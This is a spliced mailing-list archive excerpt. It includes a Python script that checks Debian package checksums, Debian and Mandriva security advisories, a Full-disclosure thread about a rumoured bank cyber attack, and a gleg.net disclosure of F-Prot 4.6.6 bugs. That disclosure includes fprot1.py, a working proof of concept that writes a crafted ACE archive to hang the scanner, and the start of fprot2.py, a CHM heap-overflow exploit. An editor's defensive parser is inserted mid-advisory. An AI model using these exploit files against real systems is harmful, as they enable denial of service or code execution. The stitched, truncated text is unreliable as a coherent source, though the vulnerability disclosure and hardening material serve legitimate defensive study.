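# package against the "Size/MD5 checksum" figures quoted in a DSA before
# handing it to dpkg -i. Only the standard library is used; the package name
# and figures in the usage comment are copied from the DSA 1227-1 i386 list.
import hashlib
import os


def md5_hex(data: bytes) -> str:
    """Hex MD5 digest, the form used in the advisory's checksum lines."""
    return hashlib.md5(data).hexdigest()


def check_package_bytes(data: bytes, expected_size: int, expected_md5: str) -> list:
    """Compare size and digest; return the list of mismatches (empty = ok)."""
    problems = []
    if len(data) != expected_size:
        problems.append("size %d != %d" % (len(data), expected_size))
    got = md5_hex(data)
    if got != expected_md5.lower():
        problems.append("md5 %s != %s" % (got, expected_md5))
    return problems


def check_package(path: str, expected_size: int, expected_md5: str) -> list:
    """Same check for a file on disk, as used right before 'dpkg -i path'."""
    if not os.path.isfile(path):
        return ["missing file: " + path]
    with open(path, "rb") as fh:
        return check_package_bytes(fh.read(), expected_size, expected_md5)


if __name__ == "__main__":
    import sys
    # Usage, with the DSA 1227-1 figures for the i386 package:
    #   python3 check_deb.py mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_i386.deb \
    #       11549564 41a015e8acb35a566e733d5e3efbd26f \
    #   && dpkg -i mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_i386.deb
    path, size, digest = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    problems = check_package(path, size, digest)
    for p in problems:
        print("FAIL:", p)
    sys.exit(1 if problems else 0)
```

Two caveats. MD5 is no longer collision resistant, so the digest only protects against corruption and against tampering by someone who cannot also rewrite the advisory; its value rests on the checksum line travelling inside the PGP-signed advisory text, which should be verified against the Debian keyring first. And the figures must be copied from the advisory, not from the mirror that served the file.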
Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1.dsc Size/MD5 checksum: 1003 6c5f746adeacacdf3127e17cb2aa8bee http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1.diff.gz Size/MD5 checksum: 529889 28823ccf3573c2dd660fd9d9e3e22b09 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2.orig.tar.gz Size/MD5 checksum: 33288906 806175393a226670aa66060452d31df4 Alpha architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_alpha.deb Size/MD5 checksum: 12856976 84bc9994e2d58b31b25e2bd069d1def3 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_alpha.deb Size/MD5 checksum: 3280854 caa0d6f973d08d3f2b35e52254b00c2d http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_alpha.deb Size/MD5 checksum: 152698 d9fdc6a19105ddd536acd60a8ee2ab37 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_alpha.deb Size/MD5 checksum: 34122 cafae516210656d77a176415fb8db6f4 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_alpha.deb Size/MD5 checksum: 90116 699b3712455d642e224b54c926328a4c AMD64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_amd64.deb Size/MD5 checksum: 12259294 289d4d588a4c47385220edb78c04afae http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_amd64.deb Size/MD5 checksum: 3282040 f4c6b066917601dad180472abf540098 
http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_amd64.deb Size/MD5 checksum: 151728 58934099903d70e9299390ea13f59df5 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_amd64.deb Size/MD5 checksum: 34120 08a6bedf50fe0457cbce271965871b47 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_amd64.deb Size/MD5 checksum: 89962 ba63d212aa7a4aeed16ed0f2d80d6a86 ARM architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_arm.deb Size/MD5 checksum: 10345710 e715702c5b2aa723f9d25802287e94e4 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_arm.deb Size/MD5 checksum: 3273096 cce5d1fd85a8409b4af4ff6f7968e9d2 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_arm.deb Size/MD5 checksum: 143868 8a3036032e81ef1010e3a3162725a818 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_arm.deb Size/MD5 checksum: 34132 f2ab43ddc5f063963bef4e1ff6d9c956 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_arm.deb Size/MD5 checksum: 81934 ae1ce06ee154fb9e85fea35aaf5311fc HP Precision architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_hppa.deb Size/MD5 checksum: 13571836 d5c2bbb909b9d6be2ca180f14c307f1e http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_hppa.deb Size/MD5 checksum: 3285646 5c9f816a25d33453f59179991ea74d0d 
http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_hppa.deb Size/MD5 checksum: 153926 4f22d429a7781c9f09b4edb68816c853 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_hppa.deb Size/MD5 checksum: 34134 cae400c43c5f0f5e0e276a047dbdab20 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_hppa.deb Size/MD5 checksum: 97998 bf0c11bb906656980cc4e5744eb464bd Intel IA-32 architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_i386.deb Size/MD5 checksum: 11549564 41a015e8acb35a566e733d5e3efbd26f http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_i386.deb Size/MD5 checksum: 3279334 7f4340a3a8a8194a7e99bd818866c57e http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_i386.deb Size/MD5 checksum: 147232 ad62baa206ff857d41db06fc9985881e http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_i386.deb Size/MD5 checksum: 34122 463263b2b57ed86dcde4f3bb458d0cf7 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_i386.deb Size/MD5 checksum: 88704 427bbd7d9754931c19829bc21096553d Intel IA-64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_ia64.deb Size/MD5 checksum: 14632100 53cd255c1673064d35138b4ddd9a00dd http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_ia64.deb Size/MD5 checksum: 3291608 e4d9bf2df8ae5a7ca3730f12409fe836 
http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_ia64.deb Size/MD5 checksum: 156062 a264399ce67bcfef3823da09effe603f http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_ia64.deb Size/MD5 checksum: 34120 beeb92a784afcee38f2ea9c5a5747a8c http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_ia64.deb Size/MD5 checksum: 107826 ce5eb8ae242c1e3ae2de7b2dd4638086 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_m68k.deb Size/MD5 checksum: 10795348 67b697071cc0d1f5667c6ed7464e90f7 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_m68k.deb Size/MD5 checksum: 3272426 d1a76c3cc4d53d311d4fa2933fa241aa http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_m68k.deb Size/MD5 checksum: 145646 bb4e9eed4d5639080ad0f40d4b9ccd3e http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_m68k.deb Size/MD5 checksum: 34148 7a167f58be69a5f87ae0b6ff696c195b http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_m68k.deb Size/MD5 checksum: 83168 00b7c01b14e69d3de5b716a97b531135 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_mips.deb Size/MD5 checksum: 11949608 9ec9db79429dda4d407ccf88ccdcd432 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_mips.deb Size/MD5 checksum: 3280190 9c5196972a3cf0c2c526f858aca2466e 
http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_mips.deb Size/MD5 checksum: 148640 5797fb7d9315c3143f3764f6b6f85c25 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_mips.deb Size/MD5 checksum: 34124 cb575700d4f03213414e5723de4f71e3 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_mips.deb Size/MD5 checksum: 85368 0ac0335d952db222dd2cabb47aebaf93 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_mipsel.deb Size/MD5 checksum: 11817496 aba31a9b55e305979548c2bc354d25b8 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_mipsel.deb Size/MD5 checksum: 3281036 ad64af4aa0945eb30474881150f19368 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_mipsel.deb Size/MD5 checksum: 148210 efb0d8070713c0392b4bf515df28b2a2 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_mipsel.deb Size/MD5 checksum: 34122 7506a7d0d2452a5aa57a8e729a129afe http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_mipsel.deb Size/MD5 checksum: 85264 a660f1051091732b2b827a25169bcd13 PowerPC architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_powerpc.deb Size/MD5 checksum: 10913258 2b2bc733b1a9c582846a35e09f790792 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_powerpc.deb Size/MD5 checksum: 3270832 f0971f53b8576629a543e31b13b5fc82 
http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_powerpc.deb Size/MD5 checksum: 145640 b0f543ffae409f9c2ed5feb623d9ccc9 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_powerpc.deb Size/MD5 checksum: 34126 d00d244fff67496236b40c606eb2b068 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_powerpc.deb Size/MD5 checksum: 82090 08904221a4f22160c5448adc5e584892 IBM S/390 architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_s390.deb Size/MD5 checksum: 12706338 9cff7d191572124759121b992f9fcbbe http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_s390.deb Size/MD5 checksum: 3281302 32b6910f4a3352602eb5f2fba6496b5c http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_s390.deb Size/MD5 checksum: 152014 b85e247ddc89da9251bc96237bc496cb http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_s390.deb Size/MD5 checksum: 34118 34fa6f63472be37d37e23ce669dc9ae3 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_s390.deb Size/MD5 checksum: 89892 c8e4543a63614010de56776b5b597006 Sun Sparc architecture: http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.2-2.sarge1.0.8d.1_sparc.deb Size/MD5 checksum: 11182150 3728f5afbe35203ae332876bc1804866 http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.2-2.sarge1.0.8d.1_sparc.deb Size/MD5 checksum: 3276596 305ba0ef1c0dec7b7057af38507a981b 
http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.2-2.sarge1.0.8d.1_sparc.deb
    Size/MD5 checksum:   145322 6799c906fa439170521396913ba7092a
http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.2-2.sarge1.0.8d.1_sparc.deb
    Size/MD5 checksum:    34118 4ac987cbe24509923ed7cf89c78995dc
http://security.debian.org/pool/updates/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.0.2-2.sarge1.0.8d.1_sparc.deb
    Size/MD5 checksum:    83734 191466ecaad65e7781192a118749fc45

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFc9kCW5ql+IAeqTIRAlWUAJ4yg4SG/SCLzd///G08uHiPjnxtiACgqN6r
iMNDIuBp0otB0CAnhO2A2Cw=
=otNU
-----END PGP SIGNATURE-----

From research at gleg.net Mon Dec 4 13:48:59 2006
From: research at gleg.net (research at gleg.net)
Date: Mon, 4 Dec 2006 16:48:59 +0300
Subject: [Full-disclosure] F-Prot Antivirus for Unix: heap overflow and Denial of Service
Message-ID: <1165240139.4574274b9c2fa@cp55.agava.net>

Name: F-Prot Antivirus for Unix: heap overflow and Denial of Service
Vendor: http://www.f-prot.com
Release date: 4 Dec, 2006
URL: http://gleg.net/fprot.txt
Author: Evgeny Legerov

I. DESCRIPTION

Two vulnerabilities in F-Prot Antivirus 4.6.6 for Unix platforms could allow a remote attacker to cause a DoS or execute arbitrary code.

II. DETAILS

1. ACE file Denial of Service

When parsing a specially crafted ACE compressed file F-Prot Antivirus will enter an infinite loop. See fprot1.py for more details.

2. CHM file heap overflow

When parsing a specially crafted CHM file a heap overflow will occur in F-Prot Antivirus. See fprot2.py for more details.

III. VENDOR RESPONSE

Update to F-Prot 4.6.7: http://www.f-prot.com/news/gen_news/061201_release_unix467.html

IV. EXPLOITS

# fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# To test this code on Linux:
#
# create ACE compressed file
# $ ./fprot1.py > 1.ace
# $ f-prot 1.ace

import sys

# Hex dump of the crafted archive: an ACE main header followed by one
# file header whose PACK_SIZE field is 0xffffffd0.
ACE = """
58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 02 00 31 12 82 33
b6 45 97 7d 00 00 00 00 16 2a 55 4e 52 45 47 49 53 54 45 52 45 44
20 56 45 52 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff 00 00
00 00 41 42 43 44 41 42 43 44 00 00 00 00 02 05 41 41 41 41 0d 00
41 41 41 41 41 41 41 41 41 41 41 41 41
"""

# Decode the dump into raw bytes and write them to stdout unmodified.
# The original was Python 2 and wrote a str; on Python 3 the bytes have
# to go through the binary stdout buffer.
sys.stdout.buffer.write(bytes.fromhex(ACE))


# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap
# overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# $ ./fprot2.py > 1.chm
# $ f-prot 1.chm

import sys
import struct

s = ""
s += "ITSF"          # CHM (ITSS) file signature
s += struct.pack(

[The rest of fprot2.py, and the mail headers of the next message, are missing from the list archive; the Mandriva advisory below begins mid-message.]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:214-1
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : gv
 Date    : December 4, 2006
 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Stack-based buffer overflow in the ps_gettext function in ps.c for GNU
 gv 3.6.2, and possibly earlier versions, allows user-assisted attackers
 to execute arbitrary code via a PostScript (PS) file with certain
 headers that contain long comments, as demonstrated using the
 DocumentMedia header.

 Packages have been patched to correct this issue.

 Update:

 The patch used in the previous update still left the possibility of
 causing X to consume unusual amounts of memory if gv is used to view a
 carefully crafted image designed to exploit CVE-2006-5864. This update
 uses an improved patch to address this issue.
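Added example (editor's, not code from the gleg.net advisory or from F-Prot), going back to the fprot1.py proof of concept in the F-Prot post above. The bytes it writes are an ACE main header followed by a single file header whose PACK_SIZE is 0xffffffd0: read as a signed 32-bit value that is -48, which is exactly the file header's 44 bytes plus its 4-byte CRC/size prefix. A parser that advances by PACK_SIZE with 32-bit arithmetic therefore lands on the same header again and never terminates. The script below parses both headers, reproduces that behaviour with a capped "trusting" walk, and then runs a hardened walk that rejects the file. The field layout is an assumption of mine taken from the public ACE 2.0 format as implemented in the unace sources (HEAD_CRC, HEAD_SIZE, HEAD_TYPE, HEAD_FLAGS, then type-specific fields); the advisory does not state it, and HEAD_CRC is read but not verified.

```python
"""Walk ACE archive headers and flag an unbounded PACK_SIZE.

Editor's example; not part of the F-Prot advisory or product. Header
layout assumed from the public ACE 2.0 format (unace). HEAD_CRC is
parsed but not verified.
"""
import struct

# The byte sequence fprot1.py emits (the advisory's PoC), embedded so
# this script runs without that file.
FPROT1_ACE = bytes.fromhex(
    "58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 02 00 31 12 82 33"
    " b6 45 97 7d 00 00 00 00 16 2a 55 4e 52 45 47 49 53 54 45 52 45 44"
    " 20 56 45 52 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff 00 00"
    " 00 00 41 42 43 44 41 42 43 44 00 00 00 00 02 05 41 41 41 41 0d 00"
    " 41 41 41 41 41 41 41 41 41 41 41 41 41"
)

MAIN_HEADER, FILE_HEADER = 0, 1


def parse_header(data, off):
    """Parse the ACE header that starts at byte offset `off`."""
    if off + 4 > len(data):
        raise ValueError(f"no room for a header at offset {off}")
    head_crc, head_size = struct.unpack_from("<HH", data, off)
    body = data[off + 4:off + 4 + head_size]
    if len(body) != head_size:
        raise ValueError(f"header at offset {off} claims {head_size} bytes, file ends first")
    head_type, head_flags = struct.unpack_from("<BH", body, 0)
    hdr = {"offset": off, "crc": head_crc, "size": head_size,
           "type": head_type, "flags": head_flags,
           "data_offset": off + 4 + head_size}      # first byte after this header
    if head_type == MAIN_HEADER:
        if bytes(body[3:10]) != b"**ACE**":
            raise ValueError("main header without **ACE** signature")
        (hdr["ver_mod"], hdr["ver_cr"], hdr["host"], hdr["volnum"],
         hdr["time"]) = struct.unpack_from("<BBBBI", body, 10)
        av_size = body[26]                         # after 8 reserved bytes
        hdr["av"] = bytes(body[27:27 + av_size])   # "*UNREGISTERED VERSION*" in the PoC
    elif head_type == FILE_HEADER:
        (hdr["pack_size"], hdr["orig_size"], hdr["ftime"], hdr["attr"],
         hdr["crc32"], hdr["techinfo"], hdr["reserved"],
         fname_size) = struct.unpack_from("<IIIIIIHH", body, 3)
        hdr["fname"] = bytes(body[31:31 + fname_size])
    return hdr


def walk_trusting_pack_size(data, max_steps=8):
    """Mimic a parser that jumps PACK_SIZE bytes past each file header using
    32-bit offsets. Returns the header offsets visited, capped so it ends."""
    visited, off = [], 0
    while len(visited) < max_steps and off + 4 <= len(data):
        hdr = parse_header(data, off)
        visited.append(off)
        off = hdr["data_offset"]
        if hdr["type"] == FILE_HEADER:
            off = (off + hdr["pack_size"]) & 0xFFFFFFFF   # wraps like a uint32 in C
    return visited


def walk_checked(data):
    """Hardened walk: PACK_SIZE must fit in the file and every step must advance."""
    off, headers = 0, []
    while off + 4 <= len(data):
        hdr = parse_header(data, off)
        headers.append(hdr)
        nxt = hdr["data_offset"]
        if hdr["type"] == FILE_HEADER:
            remaining = len(data) - nxt
            if hdr["pack_size"] > remaining:
                raise ValueError(f"PACK_SIZE 0x{hdr['pack_size']:08x} at offset {off} "
                                 f"exceeds the {remaining} bytes left in the file")
            nxt += hdr["pack_size"]
        if nxt <= off:
            raise ValueError(f"header chain does not advance at offset {off}")
        off = nxt
    return headers


def check_ace(data):
    """Return (ok, message) for a candidate ACE file."""
    try:
        headers = walk_checked(data)
    except ValueError as exc:
        return False, str(exc)
    return True, f"{len(headers)} headers parsed cleanly"


if __name__ == "__main__":
    print("trusting walk visits offsets:", walk_trusting_pack_size(FPROT1_ACE))
    print("checked walk:", check_ace(FPROT1_ACE))
```

On the PoC the trusting walk visits offset 0 once and then offset 53 over and over, which is the loop the advisory describes; the checked walk stops at the file header because 0xffffffd0 bytes of packed data cannot fit in the 0 bytes that follow it. Zeroing the four PACK_SIZE bytes makes the same file parse cleanly, so the size field alone, not the unregistered-version string or the odd timestamps, is what the check has to bound.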
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5864 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: 7226199941b3c2bae9d572fa18287cec 2006.0/i586/gv-3.6.1-4.3.20060mdk.i586.rpm cf07ebfa4c2b7b71a12e001ba72074cf 2006.0/SRPMS/gv-3.6.1-4.3.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 2b6d68c47a6774c8b27ad8263ff89f96 2006.0/x86_64/gv-3.6.1-4.3.20060mdk.x86_64.rpm cf07ebfa4c2b7b71a12e001ba72074cf 2006.0/SRPMS/gv-3.6.1-4.3.20060mdk.src.rpm Mandriva Linux 2007.0: 63a4fc9774e298c2c6904ffcce648216 2007.0/i586/gv-3.6.1-7.2mdv2007.0.i586.rpm 17718d7117787714553282997268e4d6 2007.0/SRPMS/gv-3.6.1-7.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: c8c9f156f94c083597a18476760df046 2007.0/x86_64/gv-3.6.1-7.2mdv2007.0.x86_64.rpm 17718d7117787714553282997268e4d6 2007.0/SRPMS/gv-3.6.1-7.2mdv2007.0.src.rpm Corporate 3.0: 7c282139a275fa0886e284649fe84549 corporate/3.0/i586/gv-3.5.8-31.2.C30mdk.i586.rpm ac4f70a00ad3a619a3be53d8f83b3325 corporate/3.0/SRPMS/gv-3.5.8-31.2.C30mdk.src.rpm Corporate 3.0/X86_64: 0844488c9a53873554e7d092ec372889 corporate/3.0/x86_64/gv-3.5.8-31.2.C30mdk.x86_64.rpm ac4f70a00ad3a619a3be53d8f83b3325 corporate/3.0/SRPMS/gv-3.5.8-31.2.C30mdk.src.rpm Corporate 4.0: 09d1689d5390bf63c927b3cce7d5ffa6 corporate/4.0/i586/gv-3.6.1-4.3.20060mlcs4.i586.rpm c5784a887c2c4bce4db77939e2625a01 corporate/4.0/SRPMS/gv-3.6.1-4.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: 0ee8389a3bdcddc68f8814e36924ee09 corporate/4.0/x86_64/gv-3.6.1-4.3.20060mlcs4.x86_64.rpm c5784a887c2c4bce4db77939e2625a01 corporate/4.0/SRPMS/gv-3.6.1-4.3.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. 
You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFdBfNmqjQ0CJFipgRAoDcAJoChtBsA1NF7nxBpCI+Ie1sZBwadgCgtQBj B8CJCJXv0aZ8HcjT5m8z2Mo= =bJlx -----END PGP SIGNATURE----- From thegesus at gmail.com Mon Dec 4 13:26:21 2006 From: thegesus at gmail.com (TheGesus) Date: Mon, 4 Dec 2006 08:26:21 -0500 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> Message-ID: <5e70f6530612040526q17a13740s4c9118844d7de1d6@mail.gmail.com> On 12/3/06, Dave No, not that one Korn wrote: > TheGesus wrote: > > > More and more people are hearing the recommendation to "withdraw a > > little extra cash out of the banks" to prepare for cyber attacks. If > > as many as 1.32% of bank depositors take their advice and withdraw all > > their money, the banks will close their doors. > > > > Al Qaeda threatens to disrupt the electronic bank payments system. > > And YOU'RE MAKING IT HAPPEN! DUH! > > > This system contributes about 90% of the US money supply. Without it, > > 10% of the money supply (the cash & coin) must take over the work of > > the other 90%. > > > > Conclusion: Withdraw and stockpile some cash now. Shoot for at least > > three months' cash requirements. Don't wait. Start now. > > AQ don't intend to "attack the banking system". They plan to get > paranoids, suckers, and conspiracy-theorists like you to do their dirty work > for them. 
